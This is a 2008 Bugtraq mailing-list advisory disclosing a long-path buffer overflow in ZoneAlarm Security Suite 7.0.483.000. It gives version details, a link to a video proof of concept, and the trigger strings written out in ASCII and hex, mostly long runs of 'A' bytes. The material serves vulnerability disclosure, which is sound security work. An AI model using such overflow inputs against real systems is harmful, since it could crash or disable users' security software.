[<prev] [next>] [day] [month] [year] [list]
Message-Id: <200809110636.m8B6a7pC003041@www5.securityfocus.com>
Date: Thu, 11 Sep 2008 00:36:07 -0600
From: jplopezy@...il.com
To: bugtraq@...urityfocus.com
Subject: ZoneAlarm Security Suite buffer overflow
Application: ZoneAlarm Security Suite
OS: Windows Xp (All patches a day)
------------------------------------------------------
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT
------------------------------------------------------
Description
The zonealarm is a known firewall,
which in the version "security suite" brings some tools as an antivirus, antispam and so on.
Details of the version
ZoneAlarm Security Suite versión:7.0.483.000
Versión de TrueVector:7.0.483.000
Versión del controlador:7.0.483.000
Versión de motor anti-virus:3
Versión de motor antivirus:5.0.1.85
Versión de archivo DAT de firma de anti-virus 915051681
Versión de motor de protección contra programas espía:5.0.189.0
Versión de archivo DAT de firma de protección contra programas espía 01.200801.3195
Versión de AntiSpam 5.0.6.8903
------------------------------------------------------
Vulnerability
The vulnerability is caused because the program can not analyze very long paths.
This causes a buffer overflow with the possibility of execution of code.
The flaw could be exploited by malware to leave without protection to the system for instance.
------------------------------------------------------
POC/EXPLOIT
Here you can view a video proof of concept
http://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf
Strings
ASCII: · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA · · … A · … AAAAAAAAAAAAAAAAAAA · … AAAAAAAAAAAAAAAAAAA
HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 b7 20 85 20 20 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
ASCII: ……………………………AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…………AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
------------------------------------------------------
Juan Pablo Lopez Yacubian
Powered by blists - more mailing lists